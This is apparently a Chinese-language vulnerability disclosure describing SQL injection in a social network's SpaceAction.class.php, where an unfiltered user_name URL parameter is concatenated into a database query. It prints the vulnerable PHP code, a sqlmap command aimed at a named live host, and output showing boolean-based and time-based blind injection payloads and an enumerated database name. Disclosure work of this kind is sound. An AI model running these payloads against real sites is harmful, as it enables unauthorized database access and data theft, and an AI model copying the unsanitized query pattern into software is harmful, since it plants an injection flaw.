### 简要描述:
搞开发的,把产品自身安全做好才是王道,而不是借助某些所谓的安全产品来帮助防御!
### 详细说明:
Location: Home/Lib/Action/SpaceAction.class.php
代码片段
```
//profile 获得用户
public function getuser() {
if ($this->my['user_name']==$_GET['user_name']) {
$user=$this->my;
} else {
//$_GET[user_name]参数未过滤,这里的$_GET[user_name],就是url上的t.nextsns.com/?user_name
$user=$this->uModel->where("user_name='$_GET[user_name]'")->find();
}
return $user;
}
```
虽然内置了某数字的防御系统,但还是能注出数据!
```
python sqlmap.py -u "http://t.nextsns.com/?fate666888*" --batch --dbs --flush-session
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 375 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://t.nextsns.com:80/?fate666888' AND 7549=7549 AND 'etdJ'='etdJ
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://t.nextsns.com:80/?fate666888' AND SLEEP(5) AND 'vvIC'='vvIC
---
back-end DBMS: MySQL 5.0.11
available databases [1]:
[*] etnew
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201402/122133039d2b43d1623cd964c78fad99fc08ec11.jpg" alt="QQ图片20140212212952.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/122133039d2b43d1623cd964c78fad99fc08ec11.jpg)
京公网安备 11010502034610号
暂无评论